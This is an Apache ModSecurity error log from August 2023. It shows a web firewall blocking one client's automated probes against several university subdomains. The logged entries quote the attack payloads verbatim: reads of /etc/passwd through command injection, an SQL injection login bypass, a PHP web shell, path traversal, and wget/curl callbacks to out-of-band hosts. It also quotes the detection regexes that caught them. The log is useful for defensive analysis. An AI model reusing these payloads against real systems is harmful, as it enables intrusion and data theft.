[Tue Aug 29 11:34:32.341419 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WMCo-f0AAAUDQSAAAAA7"]
[Tue Aug 29 11:34:32.344016 2023] [:error] [pid 1292] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WMCo-f0AAAUMVL8AAABE"]
[Tue Aug 29 11:34:32.348741 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WMCo-f0AAAUOaS4AAABG"]
[Tue Aug 29 11:34:32.370773 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WMCo-f0AAATOA9AAAAAH"]
[Tue Aug 29 11:34:33.298612 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlga34rt49ch8tw6.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11WcCo-f0AAAUXLhgAAABM"]
[Tue Aug 29 11:34:33.312601 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WcCo-f0AAAULx7EAAABD"]
[Tue Aug 29 11:34:33.312749 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WcCo-f0AAAT@KucAAAA2"]
[Tue Aug 29 11:34:33.314549 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WcCo-f0AAATzVHUAAAAx"]
[Tue Aug 29 11:34:33.323545 2023] [:error] [pid 1281] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WcCo-f0AAAUB00sAAAA5"]
[Tue Aug 29 11:34:33.332012 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WcCo-f0AAAUOaS8AAABG"]
[Tue Aug 29 11:34:33.365238 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WcCo-f0AAAShCYkAAAAi"]
[Tue Aug 29 11:34:34.325318 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WsCo-f0AAATOA9IAAAAH"]
[Tue Aug 29 11:34:34.415074 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WsCo-f0AAAQKOvIAAAAs"]
[Tue Aug 29 11:34:35.334759 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11W8Co-f0AAAUdm24AAABS"]
[Tue Aug 29 11:34:35.336117 2023] [:error] [pid 1311] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11W8Co-f0AAAUfi8UAAABU"]
[Tue Aug 29 11:34:35.348380 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11W8Co-f0AAATPtQoAAAAM"]
[Tue Aug 29 11:34:35.356537 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11W8Co-f0AAAUDQSMAAAA7"]
[Tue Aug 29 11:34:35.363131 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11W8Co-f0AAAUdm28AAABS"]
[Tue Aug 29 11:34:36.335236 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11XMCo-f0AAAUR83IAAABI"]
[Tue Aug 29 11:34:37.301307 2023] [:error] [pid 1292] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11XcCo-f0AAAUMVMMAAABE"]
[Tue Aug 29 11:34:37.308699 2023] [:error] [pid 1311] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11XcCo-f0AAAUfi8cAAABU"]
[Tue Aug 29 11:34:37.309364 2023] [:error] [pid 1249] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11XcCo-f0AAATh0AcAAAAm"]
[Tue Aug 29 11:34:37.327589 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11XcCo-f0AAASI0DYAAAAG"]
[Tue Aug 29 11:34:37.336896 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11XcCo-f0AAAT9POMAAAA1"]
[Tue Aug 29 11:34:38.308361 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11XsCo-f0AAAUZcEkAAABO"]
[Tue Aug 29 11:34:38.311151 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlg3ujtfuybyiqxq.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/upload"] [unique_id "ZO11XsCo-f0AAATSkm4AAAAT"]
[Tue Aug 29 11:34:38.315512 2023] [:error] [pid 1304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlgzph86ufacx15y.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/upload"] [unique_id "ZO11XsCo-f0AAAUYm8EAAABN"]
[Tue Aug 29 11:34:38.317457 2023] [:error] [pid 1281] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlg1o6cs8r78tmrd.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11XsCo-f0AAAUB01AAAAA5"]
[Tue Aug 29 11:34:38.322344 2023] [:error] [pid 1235] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11XsCo-f0AAATTmRQAAAAV"]
[Tue Aug 29 11:34:38.325315 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlgu5bpjwzdeaust.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11XsCo-f0AAARdiR0AAAAK"]
[Tue Aug 29 11:34:38.327111 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11XsCo-f0AAATUxQIAAAAW"]
[Tue Aug 29 11:34:38.327802 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlghome19dpctjtm.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11XsCo-f0AAATzVHoAAAAx"]
